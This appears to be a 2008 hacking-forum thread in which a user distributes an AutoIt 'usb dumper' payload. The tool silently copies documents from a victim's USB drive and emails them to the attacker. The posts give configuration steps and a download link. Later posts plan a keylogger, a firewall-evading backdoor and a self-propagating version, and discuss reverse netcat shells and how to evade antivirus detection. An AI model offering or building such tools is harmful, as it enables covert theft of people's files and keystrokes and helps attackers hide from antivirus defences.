sc0rpi0 Posted November 16, 2008 Share Posted November 16, 2008 SCORPIO HACKSAW PAYLOAD BETA 1.0 By now, the current hacksaw is utterly useless without some kind of av killer because the primary program (usb dumper) is detected and automatically deleted by antivirus. So, I have coded up a new version of usb dumper in autoit. In case it eventually becomes detected, I have included all source as well as binary. You can use the current binary or compile it with autoit here: http://www.autoitscript.com/autoit3/downloads.shtml INSTRUCTIONS 1. change the the info in config.ini to your own information. from=example@gmail.com (put in your own gmail account) to=example@gmail.com (put in your own gmail account) username=exampleusername (put in just your username) password=examplepassword (put in your password) 2. If you would like, modify the file extensions in config.ini to those which you would like collected from a target usb drive (or just leave the current ones). ext1=.txt ext2=.doc ext3=.xls 3. Run go.bat Please PM me any problems/concerns/questions. If anyone has an idea of how to upload files (other than ftp or email), please notify me. I don't think sql would work...because its not text data. DOWNLOAD HERE: http://www.mediafire.com/?gymdtgsmroj[/font] Quote Link to comment Share on other sites More sharing options...
Xqtftqx Posted November 16, 2008 Share Posted November 16, 2008 SCORPIO HACKSAW PAYLOAD BETA 1.0 By now, the current hacksaw is utterly useless without some kind of av killer because the primary program (usb dumper) is detected and automatically deleted by antivirus. I am quite aware that autoit may be a very "noobish" language. However, it works for this project (and its the only decent one I really know). Anyway, I have coded up a new usb dumper program in it. In case it eventually becomes detected, I have included all source as well as binary. You can use the current binary or compile it with autoit here: http://www.autoitscript.com/autoit3/downloads.shtml INSTRUCTIONS 1. change the the info in config.ini to your own information. from=example@gmail.com (put in your own gmail account) to=example@gmail.com (put in your own gmail account) username=exampleusername (put in just your username) password=examplepassword (put in your password) 2. If you would like, modify the file extensions in config.ini to those which you would like collected from a target usb drive (or just leave the current ones). ext1=.txt ext2=.doc ext3=.xls 3. Run go.bat Please PM me any problems/concerns/questions. If anyone has an idea of how to upload files (other than ftp or email), please notify me. I don't think sql would work...because its not text data. DOWNLOAD HERE: http://www.mediafire.com/?gymdtgsmroj[/font] A method could be to change all the files to .txt and pass them to a php script which whould save them Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted November 17, 2008 Author Share Posted November 17, 2008 A method could be to change all the files to .txt and pass them to a php script which whould save them Not a bad idea! Thanks. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 17, 2008 Share Posted November 17, 2008 SCORPIO HACKSAW PAYLOAD BETA 1.0 By now, the current hacksaw is utterly useless without some kind of av killer because the primary program (usb dumper) is detected and automatically deleted by antivirus. So, I have coded up a new version of usb dumper in autoit. In case it eventually becomes detected, I have included all source as well as binary. You can use the current binary or compile it with autoit here: http://www.autoitscript.com/autoit3/downloads.shtml INSTRUCTIONS 1. change the the info in config.ini to your own information. from=example@gmail.com (put in your own gmail account) to=example@gmail.com (put in your own gmail account) username=exampleusername (put in just your username) password=examplepassword (put in your password) 2. If you would like, modify the file extensions in config.ini to those which you would like collected from a target usb drive (or just leave the current ones). ext1=.txt ext2=.doc ext3=.xls 3. Run go.bat Please PM me any problems/concerns/questions. If anyone has an idea of how to upload files (other than ftp or email), please notify me. I don't think sql would work...because its not text data. DOWNLOAD HERE: http://www.mediafire.com/?gymdtgsmroj[/font] cool work... i released my code for my autoIT switchblade... i dont know if theres anything you wanted to use from it.. My code is kinda noobish but i liked the idea of autoIt cause its a bit better then batch scripts... there was also someone on here who realeased some code for a self extracting autoIT payload that uses Fileinstall to include all the files into one exe... http://hak5.org/forums/index.php?showtopic=10486 Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted November 17, 2008 Author Share Posted November 17, 2008 cool work... i released my code for my autoIT switchblade... i dont know if theres anything you wanted to use from it.. My code is kinda noobish but i liked the idea of autoIt cause its a bit better then batch scripts... there was also someone on here who realeased some code for a self extracting autoIT payload that uses Fileinstall to include all the files into one exe... http://hak5.org/forums/index.php?showtopic=10486 yeah...autoit is kindof noobish in general...but much better than batch (in my humble opinion). The autoIT payload looks great. It should help clean up and expand my payload. Fileinstall is pretty good in general. Occasionally, I receive errors while using it. Eventually, I hope to expand my payload to include: -backdoor which works through firewalls (partly successful--the output doesn't always bounce back) -keylogger (almost finished) -self propagating hacksaw (work in progress). Quote Link to comment Share on other sites More sharing options...
X3N Posted November 18, 2008 Share Posted November 18, 2008 yeah...autoit is kindof noobish in general...but much better than batch (in my humble opinion). The autoIT payload looks great. It should help clean up and expand my payload. Fileinstall is pretty good in general. Occasionally, I receive errors while using it. Eventually, I hope to expand my payload to include: -backdoor which works through firewalls (partly successful--the output doesn't always bounce back) -keylogger (almost finished) -self propagating hacksaw (work in progress). i was just using a reverse netcat shell if you were planning on writing the keylogger in autoIT you might want to rethink it... it eats up to much cpu Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted November 18, 2008 Author Share Posted November 18, 2008 i was just using a reverse netcat shell if you were planning on writing the keylogger in autoIT you might want to rethink it... it eats up to much cpu really? the one i use in autoIT works perfectly fine...i haven't noticed any cpu shortages (and my computer is not that good). the keylogger uses the hotkey feature. do you know how to make netcat undetectable? most antvirus applications are extremely hostile to it. i don't like using avkillers and 99% of packers are detected. i thought of hex-editing, but gave up after an hour of trying. Quote Link to comment Share on other sites More sharing options...
X3N Posted November 18, 2008 Share Posted November 18, 2008 really? the one i use in autoIT works perfectly fine...i haven't noticed any cpu shortages (and my computer is not that good). the keylogger uses the hotkey feature. do you know how to make netcat undetectable? most antvirus applications are extremely hostile to it. i don't like using avkillers and 99% of packers are detected. i thought of hex-editing, but gave up after an hour of trying. you cant really make netcat undetectable... but its easy enought to write a netcat clone in autoIT or python... Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted November 18, 2008 Author Share Posted November 18, 2008 you cant really make netcat undetectable... but its easy enought to write a netcat clone in autoIT or python... cool! if you have developed anything like this, please PM me the autoit code. Thanks. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.